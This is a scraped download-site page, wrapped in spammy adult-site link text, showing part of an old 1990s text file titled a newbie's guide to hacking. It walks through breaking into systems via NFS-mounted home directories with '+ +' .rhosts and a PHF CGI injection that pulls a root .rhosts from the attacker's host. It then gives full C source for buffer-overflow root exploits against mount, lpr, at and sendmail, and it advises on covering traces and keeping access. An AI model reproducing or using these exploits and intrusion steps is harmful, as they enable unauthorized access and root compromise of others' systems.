亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來(lái)到蟲(chóng)蟲(chóng)下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲(chóng)蟲(chóng)下載站

?? the newbies-user's guide to hacking.txt

?? a collection of mega hacking tools
?? TXT
?? 第 1 頁(yè) / 共 4 頁(yè)
字號(hào):
			       User's guide			__________________________Well, howdi folks... I guess you are all wondering who's this guy (me)that's trying to show you a bit of everything... ?Well, I ain't telling you anything of that...Copyright, and other stuff like this (below).Copyright and stuff...______________________If you feel offended by this subject (hacking) or you think that you coulddo better, don't read the below information...This file is for educational purposes ONLY...;)I ain't responsible for any damages you made after reading this...(I'm very serious...)So this can be copied, but not modified (send me the changes, and if theyare good, I'll include them ).Don't read it, 'cuz it might be illegal.I warned you...If you would like to continue, press <PgDown>.			Intro: Hacking step by step._________________________________________________________________________________Well, this ain't exactely for begginers, but it'll have to do.What all hackers has to know is that there are 4 steps in hacking...Step 1: Getting access to site.Step 2: Hacking r00t.Step 3: Covering your traces.Step 4: Keeping that account.Ok. In the next pages we'll see exactely what I ment.Step 1: Getting access._______Well folks, there are several methods to get access to a site.I'll try to explain the most used ones.The first thing I do is see if the system has an export list:mysite:~>/usr/sbin/showmount -e victim.site.comRPC: Program not registered.If it gives a message like this one, then it's time to search another wayin.What I was trying to do was to exploit an old security problem by mostSUN OS's that could allow an remote attacker to add a .rhosts to a usershome directory... (That was possible if the site had mounted their homedirectory.Let's see what happens...mysite:~>/usr/sbin/showmount -e victim1.site.com/usr  victim2.site.com/home (everyone)/cdrom (everyone)mysite:~>mkdir /tmp/mountmysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/mysite:~>ls -sal /tmp/mount   total 9   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers   1 drwx------   3 test     100          1024 Oct  8 21:05 test/   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/  Well, we wanna hack into rapper's home.mysite:~>iduid=0 euid=0mysite:~>whoamirootmysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwdWe use /bin/csh 'cuz bash leaves a (Damn!) .bash_history  and you mightforget it on the remote server...mysite:~>su - rapperWelcome to rapper's user.mysite:~>ls -lsa /tmp/mount/   total 9   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers   1 drwx------   3 test     100          1024 Oct  8 21:05 test/   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/So we own this guy's home directory...mysite:~>echo "+ +" > rapper/.rhostsmysite:~>cd /mysite:~>rlogin victim1.site.comWelcome to Victim.Site.Com.SunOs ver....(crap).victim1:~$This is the first method...Another method could be to see if the site has an open 80 port. That wouldmean that the site has a web page.(And that's very bad, 'cuz it usually it's vulnerable).Below I include the source of a scanner that helped me when NMAP wasn't written.(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).NMAP is a scanner that does even stealth scanning, so lots of systems won'trecord it./* -*-C-*- tcpprobe.c *//* tcpprobe - report on which tcp ports accept connections *//* IO ERROR, error@axs.net, Sep 15, 1995 */#include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <errno.h>#include <netdb.h>#include <signal.h>int main(int argc, char **argv){  int probeport = 0;  struct hostent *host;  int err, i, net;  struct sockaddr_in sa;  if (argc != 2) {    printf("Usage: %s hostname\n", argv[0]);    exit(1);  }  for (i = 1; i < 1024; i++) {    strncpy((char *)&sa, "", sizeof sa);    sa.sin_family = AF_INET;    if (isdigit(*argv[1]))      sa.sin_addr.s_addr = inet_addr(argv[1]);    else if ((host = gethostbyname(argv[1])) != 0)      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);    else {      herror(argv[1]);      exit(2);    }    sa.sin_port = htons(i);    net = socket(AF_INET, SOCK_STREAM, 0);    if (net < 0) {      perror("\nsocket");      exit(2);    }    err = connect(net, (struct sockaddr *) &sa, sizeof sa);    if (err < 0) {      printf("%s %-5d %s\r", argv[1], i, strerror(errno));      fflush(stdout);    } else {      printf("%s %-5d accepted.                               \n", argv[1], i);      if (shutdown(net, 2) < 0) {	perror("\nshutdown");	exit(2);      }    }    close(net);  }  printf("                                                                \r");  fflush(stdout);  return (0);}Well, now be very carefull with the below exploits, because they usually getlogged.Besides, if you really wanna get a source file from /cgi-bin/ use thissintax : lynx http://www.victim1.com//cgi-bin/fingerIf you don't wanna do that, then do a :mysite:~>echo "+ +" > /tmp/rhostsmysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts" | nc -v - 20 victim1.site.com 80then mysite:~>rlogin -l root victim1.site.comWelcome to Victim1.Site.Com.victim1:~#Or, maybe, just try to find out usernames and passwords...The usual users are "test", "guest", and maybe the owner of the site...I usually don't do such things, but you can...Or if the site is really old, use that (quote site exec) old bug forwu.ftpd.There are  a lot of other exploits, like the remote exploits (innd, imap2,pop3, etc...) that you can find at rootshell.connectnet.com or atdhp.com/~fyodor. Enough about this topic. (besides, if you can finger the site, you canfiggure out usernames and maybe by guessing passwords (sigh!) you could getaccess to the site).Step 2: Hacking r00t.______First you have to find the system it's running...a). LINUXALL versions:A big bug for all linux versions is mount/umount and (maybe) lpr./* Mount Exploit for Linux, Jul 30 1996::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::::::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::::::::::...........:::...........:::...........::.......:......:.......:::::::::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::Discovered and Coded by Bloodmask & VioCovin Security 1996*/#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <fcntl.h>#include <sys/stat.h>#define PATH_MOUNT "/bin/mount"#define BUFFER_SIZE 1024#define DEFAULT_OFFSET 50u_long get_esp(){  __asm__("movl %esp, %eax");}main(int argc, char **argv){  u_char execshell[] =   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   int i;   int ofs = DEFAULT_OFFSET;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   /* fill start of buffer with nops */   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   /* stick asm code into the buffer */   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i < (8/4);i++)      *(addr_ptr++) = get_esp() + ofs;   ptr = (char *)addr_ptr;   *ptr = 0;   (void)alarm((u_int)0);   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");   execl(PATH_MOUNT, "mount", buff, NULL);}/*LPR exploit:I don't know the author...*/#include <stdio.h>#include <stdlib.h>#include <unistd.h>#define DEFAULT_OFFSET          50#define BUFFER_SIZE             1023long get_esp(void){   __asm__("movl %esp,%eax\n");}void main(){   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"                        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"                        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"                        "\xd7\xff\xff\xff/bin/sh";   int i;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i<2;i++)      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;   ptr = (char *)addr_ptr;   *ptr = 0;   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);}b.) Version's 1.2.* to 1.3.2NLSPATH env. variable exploit:/* It's really annoying for users and good for me... AT exploit gives only uid=0 and euid=your_usual_euid.*/#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <fcntl.h>#include <sys/stat.h>#define path "/usr/bin/at"#define BUFFER_SIZE 1024#define DEFAULT_OFFSET 50u_long get_esp(){  __asm__("movl %esp, %eax");}main(int argc, char **argv){  u_char execshell[] =   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   int i;   int ofs = DEFAULT_OFFSET;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i < (8/4);i++)      *(addr_ptr++) = get_esp() + ofs;   ptr = (char *)addr_ptr;   *ptr = 0;   (void)alarm((u_int)0);   printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");   setenv("NLSPATH",buff,1);   execl(path, "at",NULL);}SENDMAIL exploit: (don't try to chmod a-s this one... :) )/* SENDMAIL Exploit for Linux*/#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <fcntl.h>#include <sys/stat.h>#define path "/usr/bin/sendmail"#define BUFFER_SIZE 1024#define DEFAULT_OFFSET 50u_long get_esp(){  __asm__("movl %esp, %eax");}main(int argc, char **argv){  u_char execshell[] =   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   int i;   int ofs = DEFAULT_OFFSET;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i < (8/4);i++)      *(addr_ptr++) = get_esp() + ofs;   ptr = (char *)addr_ptr;   *ptr = 0;   (void)alarm((u_int)0);   printf("SENDMAIL exploit discovered by me, _PHANTOM_ in  1997\n");   setenv("NLSPATH",buff,1);   execl(path, "sendmail",NULL);}MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)

?? 快捷鍵說(shuō)明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號(hào) Ctrl + =
減小字號(hào) Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
色婷婷综合久久久久中文一区二区 | 欧美日韩和欧美的一区二区| 日本道免费精品一区二区三区| 欧美午夜电影在线播放| 日韩欧美在线123| 国产精品久久毛片a| 亚洲一区在线看| 久久成人免费日本黄色| 99久久精品国产一区| 91麻豆精品国产91久久久久久| 久久综合色之久久综合| 亚洲精品精品亚洲| 国产在线视频不卡二| 91麻豆swag| 日韩一级二级三级精品视频| 最新热久久免费视频| 日本系列欧美系列| 99这里都是精品| 91精品国产aⅴ一区二区| 国产精品色婷婷| 免费xxxx性欧美18vr| 99国产一区二区三精品乱码| 日韩一区二区三免费高清| 日韩一区欧美小说| 国产精品三级av| 日韩中文字幕区一区有砖一区 | 精品国产凹凸成av人导航| 亚洲欧美日韩国产成人精品影院| 麻豆精品一区二区av白丝在线| 91网站在线播放| 久久综合狠狠综合久久综合88| 夜夜精品视频一区二区 | 欧美韩国日本一区| 爽好久久久欧美精品| 9i看片成人免费高清| 久久精子c满五个校花| 爽好久久久欧美精品| 日本韩国欧美在线| 国产无人区一区二区三区| 免费在线观看日韩欧美| 欧美三级视频在线| 亚洲天堂2014| 高清国产一区二区| 久久嫩草精品久久久精品一| 喷水一区二区三区| 欧美日韩国产首页在线观看| 亚洲精品视频一区| 99精品视频在线免费观看| 久久久精品国产99久久精品芒果| 日韩av中文字幕一区二区三区| 在线观看日韩电影| 亚洲日本在线天堂| www.欧美精品一二区| 亚洲国产精品传媒在线观看| 精品一区二区精品| 91精品国产综合久久久久久| 亚洲国产日韩一级| 欧美在线观看一区二区| 亚洲视频每日更新| 91丨九色丨黑人外教| 国产精品久久影院| 波多野结衣视频一区| 美女高潮久久久| 欧美一区二区三区喷汁尤物| 亚洲自拍与偷拍| 91黄色免费看| 亚洲精品欧美专区| 在线免费观看日本欧美| 亚洲综合丁香婷婷六月香| 在线观看国产91| 一区二区三区小说| 欧美午夜精品一区二区三区| 亚洲一区二区三区不卡国产欧美 | 亚洲一区二区三区四区不卡| 色国产精品一区在线观看| 一区二区三区四区蜜桃| 色综合久久66| 一级做a爱片久久| 欧美日韩一区二区三区视频 | 日韩精品一区二区三区四区| 美女视频网站久久| 日韩女优毛片在线| 国产乱码精品一区二区三| 欧美激情综合在线| 色综合天天综合网国产成人综合天| 亚洲欧美日本韩国| 欧美群妇大交群中文字幕| 免费人成网站在线观看欧美高清| 欧美大白屁股肥臀xxxxxx| 国产一区在线精品| 亚洲欧美在线观看| 欧美日韩在线一区二区| 日本亚洲视频在线| 国产亚洲欧美日韩日本| 成人av综合一区| 亚洲一二三区不卡| 91精品国产91久久久久久一区二区| 美女高潮久久久| 国产精品色眯眯| 欧美性感一类影片在线播放| 蜜臀av一区二区在线观看| 日本一区二区三级电影在线观看| 99久久精品情趣| 亚洲一区二区三区四区在线观看 | eeuss鲁片一区二区三区在线观看 eeuss鲁片一区二区三区在线看 | 中文字幕亚洲电影| 欧美视频中文一区二区三区在线观看| 婷婷六月综合网| 久久久久久一二三区| 色综合久久99| 久久精品二区亚洲w码| 国产精品免费久久| 欧美日韩国产成人在线91| 狠狠色狠狠色综合| 亚洲精品菠萝久久久久久久| 91精品福利在线一区二区三区| 粉嫩欧美一区二区三区高清影视| 一卡二卡欧美日韩| 久久久无码精品亚洲日韩按摩| 色婷婷国产精品综合在线观看| 欧美aaa在线| 日韩理论片网站| 日韩精品一区二区三区视频播放 | 久久精品这里都是精品| 在线看日本不卡| 国产精品香蕉一区二区三区| 一个色妞综合视频在线观看| 精品第一国产综合精品aⅴ| 91麻豆免费看| 韩国一区二区在线观看| 亚洲女厕所小便bbb| 久久综合av免费| 欧美日韩亚洲高清一区二区| 国产99久久久国产精品潘金网站| 亚洲福利视频导航| 中文字幕av不卡| 日韩欧美第一区| 在线观看免费成人| 成人v精品蜜桃久久一区| 免费在线观看日韩欧美| 亚洲黄色片在线观看| 国产日韩av一区| 欧美一区二区三区精品| 在线看国产一区| 99免费精品视频| 国产精品综合网| 免费在线观看日韩欧美| 亚洲午夜在线观看视频在线| 国产精品久久久久影院亚瑟| 精品国产凹凸成av人导航| 欧美二区三区91| 在线观看三级视频欧美| 99久久久免费精品国产一区二区| 激情五月婷婷综合网| 三级一区在线视频先锋| 亚洲一区二区在线播放相泽| 中文字幕在线免费不卡| 欧美激情中文不卡| 国产视频一区二区三区在线观看| 91精品国产综合久久久蜜臀图片| 欧美在线观看一二区| 久久久久免费观看| 欧美成人精品高清在线播放| 欧美美女激情18p| 欧美亚洲高清一区| 91亚洲资源网| 99久久免费视频.com| 国产成人av一区二区三区在线观看| 九九精品一区二区| 久久国产精品99久久人人澡| 男人的j进女人的j一区| 日韩国产精品久久| 全国精品久久少妇| 日本美女一区二区三区视频| 日韩精品电影在线| 免费人成在线不卡| 日本欧美肥老太交大片| 蜜桃视频在线观看一区二区| 日本伊人色综合网| 久久国产精品72免费观看| 免费观看30秒视频久久| 精品在线一区二区三区| 精品无人区卡一卡二卡三乱码免费卡| 麻豆精品新av中文字幕| 久久精品久久99精品久久| 激情久久五月天| 国产酒店精品激情| 国产成人h网站| caoporm超碰国产精品| 94-欧美-setu| 在线观看免费成人| 欧美日韩大陆在线| 日韩欧美一区二区不卡| 亚洲精品在线观看网站| 国产日韩欧美一区二区三区乱码| 久久精品无码一区二区三区| 中文字幕av在线一区二区三区| 自拍偷在线精品自拍偷无码专区| 樱桃国产成人精品视频| 五月婷婷久久综合|